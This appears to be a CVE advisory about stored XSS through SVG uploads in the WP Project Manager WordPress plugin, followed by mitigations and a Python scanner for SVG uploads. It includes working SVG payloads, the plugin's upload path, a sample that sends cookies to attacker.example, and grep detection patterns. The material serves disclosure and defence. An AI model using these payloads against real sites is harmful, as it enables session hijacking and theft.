The WP Project Manager plugin for WordPress (≤ v2.6.22) does not sanitize SVG file uploads, so an authenticated user with the Author role or higher can upload an SVG that carries JavaScript. SVG is an XML document format: when a victim opens the uploaded file directly in the browser (scripts are not run when an SVG is only displayed through an `<img>` tag), the embedded script executes in the site's origin, enabling session hijacking, defacement, or malware delivery. The flaw lies in the plugin's `file_upload` handler, which accepts the upload on the strength of its declared SVG content type without parsing the actual markup.
DailyCVE Form:
Platform: WordPress
Version: ≤ 2.6.22
Vulnerability: Stored XSS
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploit:
1. Craft malicious SVG:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
2. Upload via `/wp-admin/admin.php?page=project-manager-file-upload`.
3. The payload fires when an administrator opens the uploaded file directly in the browser (navigating to its URL, not viewing it through an `<img>` tag).
Protection:
1. Patch to v2.6.23+.
2. Add an `.htaccess` rule under wp-content/uploads so SVGs are never rendered as documents. Match case-insensitively and include `.svgz`: mod_mime maps extensions case-insensitively, so `logo.SVG` is still served as image/svg+xml, but `FilesMatch` is a case-sensitive regex unless told otherwise:
<FilesMatch "(?i)\.svgz?$">
  ForceType text/plain
</FilesMatch>
This also stops legitimate SVGs from displaying inline. If they must keep displaying, leave the image type in place and instead (with mod_headers) send `Header set Content-Security-Policy "default-src 'none'; style-src 'unsafe-inline'"` and `Header set Content-Disposition attachment` for the same files: the CSP blocks inline handlers and `<script>` inside the SVG, the disposition forces a download on direct navigation, and `<img>` embedding ignores both.
3. WordPress filter (only effective if the plugin's handler passes uploads through WordPress's own file-type checks; WordPress core does not allow SVG uploads unless another plugin or theme has added the type, so this removes it again):
add_filter('upload_mimes', function($mimes) { unset($mimes['svg'], $mimes['svgz']); return $mimes; });
Detection:
Scan existing uploads for script constructs, not just `onload=` (case-insensitive, SVG files only, matching file names listed; run `zgrep` with the same pattern over `*.svgz`):
grep -rliE '<script|\bon[a-z]+\s*=|javascript:|<foreignobject' --include='*.svg' --include='*.SVG' /var/www/html/wp-content/uploads/
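Added example, not code from the advisory or from the WP Project Manager plugin: the root cause is that the upload handler trusts the declared content type instead of parsing the markup, and the grep in the Detection step only matches a pattern on raw bytes. This Python script does what the handler should have done, parsing each SVG with an XML parser and flagging `<script>`, `foreignObject`, `on*` handlers and `javascript:` hrefs (including the tab-obfuscated and `<set>`/`<animate>` variants), unwrapping gzip `.svgz`, then scans a directory the way the grep does. The sample files, their names and the rule set are constructed assumptions; point `scan_uploads()` at wp-content/uploads to run it for real.

```python
"""Added example (not the advisory's or the plugin's code): audit SVG uploads by
parsing the markup rather than trusting the declared content type, and scan an
uploads directory for the constructs that run script when the file is opened
directly. Sample files, names and the rule set are constructed for illustration."""
import gzip
import os
import re
import tempfile
import xml.etree.ElementTree as ET

MAX_BYTES = 1 << 20                              # refuse to parse anything larger (entity-expansion defence)
SCRIPT_ELEMENTS = {"script", "foreignobject"}    # run script or embed (X)HTML that can
ANIMATION_ELEMENTS = {"set", "animate"}          # can animate an href into javascript:
JS_SCHEME = re.compile(r"(?:javascript|vbscript):", re.I)

def _local(qname):
    """'{namespace}name' -> 'name', lower-cased, so xlink:href and href compare alike."""
    return qname.rsplit("}", 1)[-1].lower()

def _is_js_uri(value):
    """Browsers drop embedded tab/CR/LF and leading controls before reading the
    scheme, so 'java<TAB>script:' and ' javascript:' still execute; mirror that."""
    cleaned = re.sub(r"^[\x00-\x20]+", "", re.sub(r"[\t\r\n]", "", value))
    return JS_SCHEME.match(cleaned) is not None

def audit_svg(data):
    """Return a list of findings for one SVG document; [] means nothing scriptable."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML ({exc})"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in SCRIPT_ELEMENTS:
            findings.append(f"<{tag}> element")
        for qname, value in el.attrib.items():
            attr = _local(qname)
            if attr.startswith("on"):                    # onload, onclick, onbegin, onerror, ...
                findings.append(f"{attr}= handler on <{tag}>")
            elif attr == "href" and _is_js_uri(value):    # href or xlink:href
                findings.append(f"javascript: URI in href on <{tag}>")
            elif tag in ANIMATION_ELEMENTS and attr in ("to", "from", "values") \
                    and any(_is_js_uri(v) for v in value.split(";")):
                findings.append(f"animated javascript: URI via <{tag} {attr}>")
    return findings

def scan_uploads(root_dir):
    """Map each SVG-looking file under root_dir (relative path) to its findings.
    The extension is attacker-chosen, so files are recognised by content as well."""
    report = {}
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root_dir)
            with open(path, "rb") as fh:
                data = fh.read(MAX_BYTES + 1)
            if data[:2] == b"\x1f\x8b":                  # .svgz is gzip-wrapped SVG
                try:
                    data = gzip.decompress(data)
                except (OSError, EOFError):
                    report[rel] = ["corrupt or oversized gzip member"]
                    continue
            if len(data) > MAX_BYTES:
                report[rel] = ["exceeds MAX_BYTES; rejected unparsed"]
                continue
            if name.lower().endswith((".svg", ".svgz")) or b"<svg" in data[:4096].lower():
                report[rel] = audit_svg(data)
    return report

# Constructed samples: a benign file, the advisory's onload payload, and the
# variants a grep for "onload=" alone would miss.
SAMPLES = {
    "logo.svg": b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
                b'<circle cx="5" cy="5" r="4" fill="#09f"/></svg>',
    "onload.svg": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>',
    "script.svg": b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg">'
                  b'<script>fetch("//attacker.example/?c=" + document.cookie)</script></svg>',
    "xlink.svg": b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                 b'<a xlink:href="java&#9;script:alert(1)"><text y="20">click</text></a></svg>',
    "Avatar.SVG": b'<svg xmlns="http://www.w3.org/2000/svg"><foreignObject>'
                  b'<body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(1)"/>'
                  b'</body></foreignObject></svg>',
    "icon.svgz": gzip.compress(b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>'),
}

def demo():
    """Write the samples to a temporary directory, scan it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, blob in SAMPLES.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(blob)
        return scan_uploads(tmp)

if __name__ == "__main__":
    for path, findings in sorted(demo().items()):
        print(f"{path}: {'; '.join(findings) if findings else 'clean'}")
```

Used as a pre-upload check, anything with a non-empty finding list is rejected rather than stripped: removing `<script>` from hostile markup and keeping the rest is a well-trodden path to bypasses, and a legitimate project attachment never needs script.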
Mitigation:
- Restrict file uploads to Editors+.
- Implement CSP headers. `script-src 'unsafe-inline'` would permit exactly the inline handlers and `<script>` elements this attack relies on, and a CSP sent with the WordPress pages does not govern an SVG opened as its own document; the header must accompany the SVG response itself (e.g. for files served from wp-content/uploads), blocking all script while keeping the inline styling most SVGs use:
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'
References:
Sources:
Reported By: nvd.nist.gov